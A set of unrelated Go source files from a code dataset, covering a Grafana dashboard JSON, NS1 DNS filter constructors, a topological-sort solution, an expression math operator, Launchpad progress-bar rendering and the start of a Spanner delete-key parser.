"hideControls": true,
"sharedCrosshair": false,
"rows": [
{
"collapse": false,
"editable": false,
"height": "250px",
"panels": [
{
"cacheTimeout": null,
"colorBackground": false,
"colorValue": false,
"colors": [
"rgba(245, 54, 54, 0.9)",
"rgba(237, 129, 40, 0.89)",
"rgba(50, 172, 45, 0.97)"
],
"datasource": null,
"editable": false,
"error": false,
"format": "percent",
"gauge": {
"maxValue": 100,
"minValue": 0,
"show": true,
"thresholdLabels": false,
"thresholdMarkers": true
},
"height": "",
"id": 2,
"interval": "1s",
"isNew": true,
"links": [],
"maxDataPoints": 100,
"nullPointMode": "connected",
"nullText": null,
"postfix": "",
"postfixFontSize": "50%",
"prefix": "",
"prefixFontSize": "50%",
"span": 2,
"sparkline": {
"fillColor": "rgba(31, 118, 189, 0.18)",
"full": false,
"lineColor": "rgb(31, 120, 193)",
"show": false
},
"targets": [
{
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "cpu",
"policy": "default",
"query": "SELECT mean(\"usage_user\") + mean(\"usage_system\") FROM \"cpu\" WHERE $timeFilter GROUP BY time($interval) fill(null)",
"rawQuery": true,
"refId": "A",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"usage_user"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": []
}
],
"thresholds": "",
"title": "Cluster CPU Avg.",
"type": "singlestat",
"valueFontSize": "80%",
"valueMaps": [
{
"op": "=",
"text": "N/A",
"value": "null"
}
],
"valueName": "avg"
},
{
"aliasColors": {},
"bars": true,
"datasource": null,
"editable": false,
"error": false,
"fill": 1,
"grid": {
"threshold1": null,
"threshold1Color": "rgba(216, 200, 27, 0.27)",
"threshold2": null,
"threshold2Color": "rgba(234, 112, 112, 0.22)"
},
"id": 1,
"isNew": true,
"legend": {
"alignAsTable": true,
"avg": false,
"current": false,
"max": false,
"min": false,
"rightSide": true,
"show": false,
"total": false,
"values": false
},
"lines": false,
"linewidth": 1,
"links": [],
"nullPointMode": "connected",
"percentage": false,
"pointradius": 1,
"points": false,
"renderer": "flot",
"seriesOverrides": [],
"span": 3,
"stack": false,
"steppedLine": false,
"targets": [
{
"alias": "[[tag_host]]",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"host"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "cpu",
"policy": "default",
"refId": "A",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"usage_user"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": []
}
],
"timeFrom": null,
"timeShift": null,
"title": "CPU usage",
"tooltip": {
"msResolution": false,
"shared": false,
"value_type": "cumulative"
},
"type": "graph",
"xaxis": {
"show": true
},
"yaxes": [
{
"format": "percent",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
},
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
}
]
},
{
"aliasColors": {},
"bars": false,
"datasource": null,
"editable": false,
"error": false,
"fill": 2,
"grid": {
"threshold1": null,
"threshold1Color": "rgba(216, 200, 27, 0.27)",
"threshold2": null,
"threshold2Color": "rgba(234, 112, 112, 0.22)"
},
"id": 4,
"isNew": true,
"legend": {
"alignAsTable": true,
"avg": false,
"current": false,
"max": false,
"min": false,
"rightSide": true,
"show": false,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"links": [],
"nullPointMode": "connected",
"percentage": false,
"pointradius": 5,
"points": false,
"renderer": "flot",
"seriesOverrides": [],
"span": 4,
"stack": false,
"steppedLine": false,
"targets": [
{
"alias": "[[tag_host]]",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"host"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "mem",
"policy": "default",
"query": "SELECT mean(\"usage_user\") FROM \"cpu\" WHERE $timeFilter GROUP BY time($interval), \"host\" fill(null)",
"rawQuery": false,
"refId": "A",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"used"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": []
}
],
"timeFrom": null,
"timeShift": null,
"title": "MEM usage",
"tooltip": {
"msResolution": false,
"shared": false,
"value_type": "cumulative"
},
"type": "graph",
"xaxis": {
"show": true
},
"yaxes": [
{
"format": "bytes",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
},
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
}
]
},
{
"aliasColors": {},
"bars": false,
"datasource": null,
"editable": true,
"error": false,
"fill": 2,
"grid": {
"threshold1": null,
"threshold1Color": "rgba(216, 200, 27, 0.27)",
"threshold2": null,
"threshold2Color": "rgba(234, 112, 112, 0.22)"
},
"id": 9,
"isNew": true,
"legend": {
"alignAsTable": true,
"avg": false,
"current": false,
"max": false,
"min": false,
"rightSide": true,
"show": false,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"links": [],
"nullPointMode": "connected",
"percentage": false,
"pointradius": 5,
"points": false,
"renderer": "flot",
"scopedVars": {},
"seriesOverrides": [],
"span": 3,
"stack": true,
"steppedLine": false,
"targets": [
{
"alias": "[[tag_host]]",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"host"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "conntrack",
"policy": "default",
"refId": "A",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"ip_conntrack_count"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": []
}
],
"timeFrom": null,
"timeShift": null,
"title": "IP Conn Track",
"tooltip": {
"msResolution": false,
"shared": false,
"value_type": "individual"
},
"type": "graph",
"xaxis": {
"show": true
},
"yaxes": [
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
},
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
}
]
}
],
"showTitle": false,
"title": "Cluster"
},
{
"collapse": false,
"editable": false,
"height": "250px",
"panels": [
{
"cacheTimeout": null,
"colorBackground": false,
"colorValue": false,
"colors": [
"rgba(245, 54, 54, 0.9)",
"rgba(237, 129, 40, 0.89)",
"rgba(50, 172, 45, 0.97)"
],
"datasource": null,
"editable": false,
"error": false,
"format": "percent",
"gauge": {
"maxValue": 100,
"minValue": 0,
"show": true,
"thresholdLabels": false,
"thresholdMarkers": true
},
"height": "",
"id": 12,
"interval": "1s",
"isNew": true,
"links": [],
"maxDataPoints": 100,
"nullPointMode": "connected",
"nullText": null,
"postfix": "",
"postfixFontSize": "50%",
"prefix": "",
"prefixFontSize": "50%",
"scopedVars": {
"service": {
"selected": true,
"text": "nextapp",
"value": "nextapp"
}
},
"span": 2,
"sparkline": {
"fillColor": "rgba(31, 118, 189, 0.18)",
"full": false,
"lineColor": "rgb(31, 120, 193)",
"show": false
},
"targets": [
{
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "mem",
"policy": "default",
"query": "SELECT 100 * sum(\"free\") / sum(\"total\") FROM \"mem\" WHERE $timeFilter GROUP BY time($interval) fill(null)",
"rawQuery": false,
"refId": "A",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"available_percent"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": []
}
],
"thresholds": "25,50",
"title": "Cluster MEM Available",
"type": "singlestat",
"valueFontSize": "80%",
"valueMaps": [
{
"op": "=",
"text": "N/A",
"value": "null"
}
],
"valueName": "avg"
},
{
"aliasColors": {},
"bars": false,
"datasource": null,
"editable": false,
"error": false,
"fill": 1,
"grid": {
"threshold1": null,
"threshold1Color": "rgba(216, 200, 27, 0.27)",
"threshold2": null,
"threshold2Color": "rgba(234, 112, 112, 0.22)"
},
"id": 10,
"interval": "5s",
"isNew": true,
"legend": {
"alignAsTable": false,
"avg": false,
"current": false,
"max": false,
"min": false,
"rightSide": false,
"show": true,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"links": [],
"nullPointMode": "connected",
"percentage": false,
"pointradius": 1,
"points": false,
"renderer": "flot",
"scopedVars": {
"service": {
"selected": true,
"text": "nextapp",
"value": "nextapp"
}
},
"seriesOverrides": [],
"span": 4,
"stack": false,
"steppedLine": false,
"targets": [
{
"alias": "[[tag_com.docker.swarm.service.name]]",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"com.docker.swarm.service.name"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "docker_container_cpu",
"policy": "default",
"refId": "B",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"usage_percent"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": []
}
],
"timeFrom": null,
"timeShift": null,
"title": "%CPU by Service",
"tooltip": {
"msResolution": true,
"shared": true,
"value_type": "cumulative"
},
"type": "graph",
"xaxis": {
"show": true
},
"yaxes": [
{
"format": "percent",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
},
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
}
]
},
{
"aliasColors": {},
"bars": false,
"datasource": null,
"editable": false,
"error": false,
"fill": 1,
"grid": {
"threshold1": null,
"threshold1Color": "rgba(216, 200, 27, 0.27)",
"threshold2": null,
"threshold2Color": "rgba(234, 112, 112, 0.22)"
},
"id": 13,
"interval": "5s",
"isNew": true,
"legend": {
"alignAsTable": false,
"avg": false,
"current": false,
"max": false,
"min": false,
"rightSide": false,
"show": true,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"links": [],
"nullPointMode": "connected",
"percentage": false,
"pointradius": 1,
"points": false,
"renderer": "flot",
"seriesOverrides": [],
"span": 4,
"stack": false,
"steppedLine": false,
"targets": [
{
"alias": "[[tag_com.docker.swarm.service.name]]",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"com.docker.swarm.service.name"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "docker_container_mem",
"policy": "default",
"refId": "B",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"usage"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": []
}
],
"timeFrom": null,
"timeShift": null,
"title": "MEM by Service",
"tooltip": {
"msResolution": true,
"shared": true,
"value_type": "cumulative"
},
"type": "graph",
"xaxis": {
"show": true
},
"yaxes": [
{
"format": "bytes",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
},
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
}
]
},
{
"aliasColors": {},
"bars": false,
"datasource": null,
"editable": false,
"error": false,
"fill": 1,
"grid": {
"threshold1": null,
"threshold1Color": "rgba(216, 200, 27, 0.27)",
"threshold2": null,
"threshold2Color": "rgba(234, 112, 112, 0.22)"
},
"id": 11,
"isNew": true,
"legend": {
"alignAsTable": false,
"avg": false,
"current": false,
"max": false,
"min": false,
"rightSide": false,
"show": true,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"links": [],
"nullPointMode": "connected",
"percentage": false,
"pointradius": 1,
"points": false,
"renderer": "flot",
"scopedVars": {
"service": {
"selected": true,
"text": "nextapp",
"value": "nextapp"
}
},
"seriesOverrides": [],
"span": 2,
"stack": false,
"steppedLine": false,
"targets": [
{
"alias": "rx drop",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"com.docker.swarm.service.name"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "docker_container_net",
"policy": "default",
"refId": "A",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"rx_dropped"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": [
{
"key": "com.docker.swarm.service.name",
"operator": "=~",
"value": "/^$service$/"
}
]
},
{
"alias": "rx error",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"com.docker.swarm.service.name"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "docker_container_net",
"policy": "default",
"refId": "B",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"rx_errors"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": [
{
"key": "com.docker.swarm.service.name",
"operator": "=~",
"value": "/^$service$/"
}
]
},
{
"alias": "tx drop",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"com.docker.swarm.service.name"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "docker_container_net",
"policy": "default",
"refId": "C",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"tx_dropped"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": [
{
"key": "com.docker.swarm.service.name",
"operator": "=~",
"value": "/^$service$/"
}
]
},
{
"alias": "tx error",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"com.docker.swarm.service.name"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "docker_container_net",
"policy": "default",
"refId": "D",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"tx_errors"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": [
{
"key": "com.docker.swarm.service.name",
"operator": "=~",
"value": "/^$service$/"
}
]
}
],
"timeFrom": null,
"timeShift": null,
"title": "$service: rx / tx",
"tooltip": {
"msResolution": false,
"shared": true,
"value_type": "cumulative"
},
"type": "graph",
"xaxis": {
"show": true
},
"yaxes": [
{
"format": "bytes",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
},
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
}
]
}
],
"repeat": "service",
"scopedVars": {
"service": {
"selected": true,
"text": "nextapp",
"value": "nextapp"
}
},
"showTitle": false,
"title": "Docker"
}
],
"time": {
"from": "now-15m",
"to": "now"
},
"timepicker": {
"refresh_intervals": [
"5s",
"10s",
"30s",
"1m",
"5m",
"15m",
"30m",
"1h",
"2h",
"1d"
],
"time_options": [
"5m",
"15m",
"1h",
"6h",
"12h",
"24h",
"2d",
"7d",
"30d"
]
},
"templating": {
"list": []
},
"annotations": {
"list": []
},
"refresh": "5s",
"schemaVersion": 12,
"version": 68,
"links": [
{
"asDropdown": false,
"icon": "external link",
"tags": [],
"type": "dashboards"
}
]
}
` | cmd/dashboard_json_v3.go | 0.568536 | 0.415729 | dashboard_json_v3.go | starcoder |
package filter
// Filter wraps the values of a Record's "filters" attribute
type Filter struct {
Type string `json:"filter"`
Disabled bool `json:"disabled,omitempty"`
Config Config `json:"config"`
}
// Enable a filter.
func (f *Filter) Enable() {
f.Disabled = false
}
// Disable a filter.
func (f *Filter) Disable() {
f.Disabled = true
}
// Config is a flat mapping where values are simple (no slices/maps).
type Config map[string]interface{}
// NewSelFirstN returns a filter that eliminates all but the
// first N answers from the list.
func NewSelFirstN(n int) *Filter {
return &Filter{
Type: "select_first_n",
Config: Config{"N": n},
}
}
// NewShuffle returns a filter that randomly sorts the answers.
func NewShuffle() *Filter {
return &Filter{Type: "shuffle", Config: Config{}}
}
// GEOGRAPHICAL FILTERS
// NewSelFirstRegion returns a filter that keeps only the answers
// that are in the same region as the first answer.
func NewSelFirstRegion() *Filter {
return &Filter{Type: "select_first_n", Config: Config{}}
}
// NewStickyRegion first sorts regions uniquely depending on the IP
// address of the requester, and then groups all answers together by
// region. The same requester always gets the same ordering of regions,
// but answers within each region may be in any order. byNetwork indicates
// whether to apply the 'stickyness' by subnet(not individual IP).
func NewStickyRegion(byNetwork bool) *Filter {
return &Filter{
Type: "sticky_region",
Config: Config{"sticky_by_network": byNetwork},
}
}
// NewGeofenceCountry returns a filter that fences using "country",
// "us_state", and "ca_province" metadata fields in answers. Only
// answers in the same country/state/province as the user (or
// answers with no specified location) are returned. rmNoLoc determines
// whether to remove answers without location on any match.
func NewGeofenceCountry(rmNoLoc bool) *Filter {
return &Filter{
Type: "geofence_country",
Config: Config{"remove_no_location": rmNoLoc},
}
}
// NewGeofenceRegional returns a filter that restricts to answers in
// same geographical region as requester. rmNoGeo determines whether
// to remove answers without georegion on any match.
func NewGeofenceRegional(rmNoGeo bool) *Filter {
return &Filter{
Type: "geofence_regional",
Config: Config{"remove_no_georegion": rmNoGeo},
}
}
// NewGeotargetCountry returns a filter that sorts answers by distance
// to requester by country, US state, and/or Canadian province.
func NewGeotargetCountry() *Filter {
return &Filter{Type: "geofence_country", Config: Config{}}
}
// NewGeotargetLatLong returns a filter that sorts answers by distance
// to user using lat/long.
func NewGeotargetLatLong() *Filter {
return &Filter{Type: "geotarget_latlong", Config: Config{}}
}
// NewGeotargetRegional returns a filter that sorts answers by distance
// to user by geographical region.
func NewGeotargetRegional() *Filter {
return &Filter{Type: "geotarget_regional", Config: Config{}}
}
// NETWORK FILTERS
// NewSticky returns a filter that sorts answers uniquely depending
// on the IP address of the requester. The same requester always
// gets the same ordering of answers. byNetwork indicates whether
// to apply the 'stickyness' by subnet(not individual IP).
func NewSticky(byNetwork bool) *Filter {
return &Filter{
Type: "sticky",
Config: Config{"sticky_by_network": byNetwork},
}
}
// NewWeightedSticky returns a filter that shuffles answers randomly
// per-requester based on weight. byNetwork indicates whether to
// apply the 'stickyness' by subnet(not individual IP).
func NewWeightedSticky(byNetwork bool) *Filter {
return &Filter{
Type: "weighted_sticky",
Config: Config{"sticky_by_network": byNetwork},
}
}
// NewIPv4PrefixShuffle returns a filter that randomly selects
// IPv4 addresses from prefix list. This filter can only be used
// A records. n is the number of IPs to randomly select per answer.
func NewIPv4PrefixShuffle(n int) *Filter {
return &Filter{
Type: "ipv4_prefix_shuffle",
Config: Config{"N": n},
}
}
// NewNetfenceASN returns a filter that restricts to answers where
// the ASN of requester IP matches ASN list. rmNoASN determines
// whether to remove answers without asn list on any match.
func NewNetfenceASN(rmNoASN bool) *Filter {
return &Filter{
Type: "netfence_asn",
Config: Config{"remove_no_asn": rmNoASN},
}
}
// NewNetfencePrefix returns a filter that restricts to answers where
// requester IP matches prefix list. rmNoIPPrefix determines
// whether to remove answers without ip prefixes on any match.
func NewNetfencePrefix(rmNoIPPrefix bool) *Filter {
return &Filter{
Type: "netfence_prefix",
Config: Config{"remove_no_ip_prefixes": rmNoIPPrefix},
}
}
// STATUS FILTERS
// NewUp returns a filter that eliminates all answers where
// the 'up' metadata field is not true.
func NewUp() *Filter {
return &Filter{Type: "up", Config: Config{}}
}
// NewPriority returns a filter that fails over according to
// prioritized answer tiers.
func NewPriority() *Filter {
return &Filter{Type: "priority", Config: Config{}}
}
// NewShedLoad returns a filter that "sheds" traffic to answers
// based on load, using one of several load metrics. You must set
// values for low_watermark, high_watermark, and the configured
// load metric, for each answer you intend to subject to load
// shedding.
func NewShedLoad(metric string) *Filter {
return &Filter{
Type: "shed_load",
Config: Config{"metric": metric},
}
}
// TRAFFIC FILTERS
// NewWeightedShuffle returns a filter that shuffles answers
// randomly based on their weight.
func NewWeightedShuffle() *Filter {
return &Filter{Type: "weighted_shuffle", Config: Config{}}
} | vendor/gopkg.in/ns1/ns1-go.v2/rest/model/filter/filter.go | 0.873902 | 0.484807 | filter.go | starcoder |
package main
import (
"container/list"
)
/*
210 course schedule II
There are a total of n courses you have to take labelled from 0 to n - 1.
Some courses may have prerequisites, for example, if prerequisites[i] = [ai, bi] this means you must take the course bi before the course ai.
Given the total number of courses numCourses and a list of the prerequisite pairs, return the ordering of courses you should take to finish all courses.
If there are many valid answers, return any of them. If it is impossible to finish all courses, return an empty array.
topological sorting, find nodes where in-degree == 0
Example 1:
Input: numCourses = 2, prerequisites = [[1,0]]
Output: [0,1]
Explanation: There are a total of 2 courses to take. To take course 1 you should have finished course 0. So the correct course order is [0,1].
Example 2:
Input: numCourses = 4, prerequisites = [[1,0],[2,0],[3,1],[3,2]]
Output: [0,2,1,3]
Explanation: There are a total of 4 courses to take. To take course 3 you should have finished both courses 1 and 2. Both courses 1 and 2 should be taken after you finished course 0.
So one correct course order is [0,1,2,3]. Another correct ordering is [0,2,1,3].
Example 3:
Input: numCourses = 1, prerequisites = []
Output: [0]
*/
func findOrderII(numCourses int, prerequisites [][]int) []int {
sequence := make([]int, 0)
if numCourses == 0 {
return sequence
}
inDegree := make(map[int]int)
queue := list.New()
graph := make(map[int][]int)
// init
for i := 0; i <numCourses; i ++ {
inDegree[i] = 0
graph[i] = []int{}
}
// calculate in degree for each node
for _, prerequisite := range prerequisites {
if len(prerequisite) != 2 {
panic("invalid input")
}
if _, exist := inDegree[prerequisite[1]]; exist {
graph[prerequisite[1]] = append(graph[prerequisite[1]], prerequisite[0])
}
if degree, exist := inDegree[prerequisite[0]]; exist {
inDegree[prerequisite[0]] = degree + 1
}
}
// find in-degree == 0
for node, degree := range inDegree {
if degree == 0 {
queue.PushBack(node)
}
}
// bfs
for queue.Len() > 0 {
ele := queue.Front().Value.(int)
sequence = append(sequence, ele)
queue.Remove(queue.Front())
for _, child := range graph[ele] {
inDegree[child] -= 1
if inDegree[child] == 0 {
queue.PushBack(child)
}
}
}
// check if possible to finish all courses
if len(sequence) == numCourses {
return sequence
}
return []int{}
} | bfs/topological-sorting/210-course-schedule.go | 0.545286 | 0.673036 | 210-course-schedule.go | starcoder |
package operators
import (
"context"
"github.com/MontFerret/ferret/pkg/runtime/core"
"github.com/MontFerret/ferret/pkg/runtime/values"
)
type (
MathOperatorType string
MathOperator struct {
*baseOperator
opType MathOperatorType
fn OperatorFunc
leftOnly bool
}
)
const (
MathOperatorTypeAdd MathOperatorType = "+"
MathOperatorTypeSubtract MathOperatorType = "-"
MathOperatorTypeMultiply MathOperatorType = "*"
MathOperatorTypeDivide MathOperatorType = "/"
MathOperatorTypeModulus MathOperatorType = "%"
MathOperatorTypeIncrement MathOperatorType = "++"
MathOperatorTypeDecrement MathOperatorType = "--"
)
var mathOperators = map[MathOperatorType]OperatorFunc{
MathOperatorTypeAdd: Add,
MathOperatorTypeSubtract: Subtract,
MathOperatorTypeMultiply: Multiply,
MathOperatorTypeDivide: Divide,
MathOperatorTypeModulus: Modulus,
MathOperatorTypeIncrement: Increment,
MathOperatorTypeDecrement: Decrement,
}
func NewMathOperator(
src core.SourceMap,
left core.Expression,
right core.Expression,
operator MathOperatorType,
) (*MathOperator, error) {
fn, exists := mathOperators[operator]
if !exists {
return nil, core.Error(core.ErrInvalidArgument, "operator type")
}
var leftOnly bool
if operator == "++" || operator == "--" {
leftOnly = true
}
return &MathOperator{
&baseOperator{src, left, right},
operator,
fn,
leftOnly,
}, nil
}
func (operator *MathOperator) Type() MathOperatorType {
return operator.opType
}
func (operator *MathOperator) Exec(ctx context.Context, scope *core.Scope) (core.Value, error) {
left, err := operator.left.Exec(ctx, scope)
if err != nil {
return nil, err
}
if operator.leftOnly {
return operator.Eval(ctx, left, values.None)
}
right, err := operator.right.Exec(ctx, scope)
if err != nil {
return nil, err
}
return operator.Eval(ctx, left, right)
}
func (operator *MathOperator) Eval(_ context.Context, left, right core.Value) (core.Value, error) {
if operator.leftOnly {
return operator.fn(left, values.None), nil
}
return operator.fn(left, right), nil
} | pkg/runtime/expressions/operators/math.go | 0.612773 | 0.430806 | math.go | starcoder |
package gfx
import (
"errors"
"github.com/rainu/launchpad-super-trigger/pad"
)
func (e Renderer) HorizontalProgressbar(y, percent int, dir Direction, fill, empty pad.Color) error {
return e.horizontalQuadrantProgressbar(y, minX, padLength, percent, dir, fill, empty)
}
func (e Renderer) HorizontalQuadrantProgressbar(q Quadrant, y, percent int, dir Direction, fill, empty pad.Color) error {
switch q {
case FirstQuadrant:
return e.horizontalQuadrantProgressbar(y, 4, padLength, percent, dir, fill, empty)
case SecondQuadrant:
return e.horizontalQuadrantProgressbar(y, minX, 4, percent, dir, fill, empty)
case ThirdQuadrant:
return e.horizontalQuadrantProgressbar(y+4, minX, 4, percent, dir, fill, empty)
case ForthQuadrant:
return e.horizontalQuadrantProgressbar(y+4, 4, padLength, percent, dir, fill, empty)
default:
return errors.New("invalid quadrant")
}
}
func (e Renderer) horizontalQuadrantProgressbar(y, xFrom, xUntil, percent int, dir Direction, fill, empty pad.Color) error {
if percent < 0 {
percent = 0
} else if percent > 100 {
percent = 100
}
length := xUntil - xFrom
p := (length * percent) / 100
pixel := make([]FramePixel, 0, length)
if dir == AscDirection {
for x := xFrom; x < xUntil; x++ {
pixel = append(pixel, FramePixel{X: x, Y: y, Color: empty})
}
} else {
for x := xUntil - 1; x >= xFrom; x-- {
pixel = append(pixel, FramePixel{X: x, Y: y, Color: empty})
}
}
for i := 0; i < p && i < len(pixel); i++ {
pixel[i].Color = fill
}
return e.Pattern(pixel...)
}
func (e Renderer) VerticalProgressbar(x, percent int, dir Direction, fill, empty pad.Color) error {
return e.verticalQuadrantProgressbar(x, minY, padHeight, percent, dir, fill, empty)
}
func (e Renderer) VerticalQuadrantProgressbar(q Quadrant, x, percent int, dir Direction, fill, empty pad.Color) error {
switch q {
case FirstQuadrant:
return e.verticalQuadrantProgressbar(x+4, minY, 4, percent, dir, fill, empty)
case SecondQuadrant:
return e.verticalQuadrantProgressbar(x, minY, 4, percent, dir, fill, empty)
case ThirdQuadrant:
return e.verticalQuadrantProgressbar(x, 4, padHeight, percent, dir, fill, empty)
case ForthQuadrant:
return e.verticalQuadrantProgressbar(x+4, 4, padHeight, percent, dir, fill, empty)
default:
return errors.New("invalid quadrant")
}
}
func (e Renderer) verticalQuadrantProgressbar(x, yFrom, yUntil, percent int, dir Direction, fill, empty pad.Color) error {
if percent < 0 {
percent = 0
} else if percent > 100 {
percent = 100
}
length := yUntil - yFrom
p := (length * percent) / 100
pixel := make([]FramePixel, 0, length)
if dir == AscDirection {
for y := yUntil - 1; y >= yFrom; y-- {
pixel = append(pixel, FramePixel{X: x, Y: y, Color: empty})
}
} else {
for y := yFrom; y < yUntil; y++ {
pixel = append(pixel, FramePixel{X: x, Y: y, Color: empty})
}
}
for i := 0; i < p && i < len(pixel); i++ {
pixel[i].Color = fill
}
return e.Pattern(pixel...)
} | gfx/progressbar.go | 0.647575 | 0.443902 | progressbar.go | starcoder |
package sqlspanner
import (
"database/sql/driver"
"fmt"
"cloud.google.com/go/spanner"
"github.com/xwb1989/sqlparser"
)
// because spanner has multiple primary keys support, EVERY field
// found in the query is assumed to be a primary key. It will build the spanner.Key with the fields in the
// query in the order they are discovered. For Example if i have two queries:
// q1 = "DELETE FROM test_table WHERE id = 1 AND simple_string="test_string"
// q2 = "DELETE FROM test_table WHERE simple_string="test_string" AND id = 1
// q1 would produce key: { 1, "test_string" }
// q2 would produce key: { "test_string", 2 }
// Try to construct your queries with ANDs instead of ORs. Because different fields are
// interpreted as primary keys, it gets too difficult to parse what is meant by queries like:
// q1 = "DELETE FROM test_table WHERE (id < 1 OR id >= 10) AND simple_string = "test_string"
// it might be possible in the future to parse the meaning of statements like this, but for now it was
// easier to just drop support of statements for OR expressions
// Other Rules:
// - NOT expressions are not supported, It is not possible to tell a spanner key what "not" means.
// - currently only one key range, per primary key is permitted. Just use two queries. ex.
// not permitted: DELETE FROM test_table WHERE id > 1 AND id < 10 AND id > 20 AND id < 100
// - Does not support cross table queries
func extractSpannerKeyFromDelete(del *sqlparser.Delete) (*MergableKeyRange, error) {
where := del.Where
if where == nil {
return nil, fmt.Errorf("Must include a where clause that contain primary keys in delete statement")
}
myArgs := &Args{}
fmt.Printf("where type: %+v\n", where.Type)
aKeySet := &AwareKeySet{
Args: myArgs,
Keys: make(map[string]*Key),
KeyOrder: make([]string, 0),
}
err := aKeySet.walkBoolExpr(where.Expr)
if err != nil {
return nil, err
}
return aKeySet.packKeySet()
}
type Key struct {
Name string
LowerValue interface{}
UpperValue interface{}
LowerOpen bool
UpperOpen bool
HaveLower bool
HaveUpper bool
}
type AwareKeySet struct {
Keys map[string]*Key
KeyOrder []string
Args *Args
}
type MergableKeyRange struct {
Start *partialArgSlice
End *partialArgSlice
LowerOpen bool
UpperOpen bool
HaveLower bool
HaveUpper bool
}
// all lower bounds are turned into a key together.
// all upper bounds are turned into a key together.
// it is expected that all fields in a query belong together
func (a *AwareKeySet) packKeySet() (*MergableKeyRange, error) {
var prev *MergableKeyRange
//makes sure all we dont have holes in our key ranges, that is undefined behaviour
for i := len(a.KeyOrder) - 1; i > 0; i-- { // dont check before the first elem
me := a.Keys[a.KeyOrder[i]]
keyBeforeMe := a.Keys[a.KeyOrder[i-1]]
if me.HaveLower {
if !keyBeforeMe.HaveLower {
return nil, fmt.Errorf("cannot have a lower bound on a key range without defining all higher priority lower bounds")
}
}
if me.HaveUpper {
if !keyBeforeMe.HaveUpper {
return nil, fmt.Errorf("cannot have a upper bound on a key range without defining all higher priority upper bounds")
}
}
}
for _, k := range a.KeyOrder {
key := a.Keys[k]
if prev == nil {
prev = &MergableKeyRange{Start: newPartialArgSlice(), End: newPartialArgSlice()}
prev.fromKey(key)
} else {
fmt.Printf("key that will populate prev: %#v\n\n", key)
err := prev.mergeKey(key)
fmt.Printf("merged prev with m %#v\n\n", prev)
if err != nil {
return nil, err
}
}
}
fmt.Printf("prev: %#v\n\n", prev)
return prev, nil
}
func (k1 *MergableKeyRange) fromKey(key *Key) {
if key == nil {
return
}
k1.LowerOpen = key.LowerOpen
k1.UpperOpen = key.UpperOpen
k1.HaveLower = key.HaveLower
k1.HaveUpper = key.HaveUpper
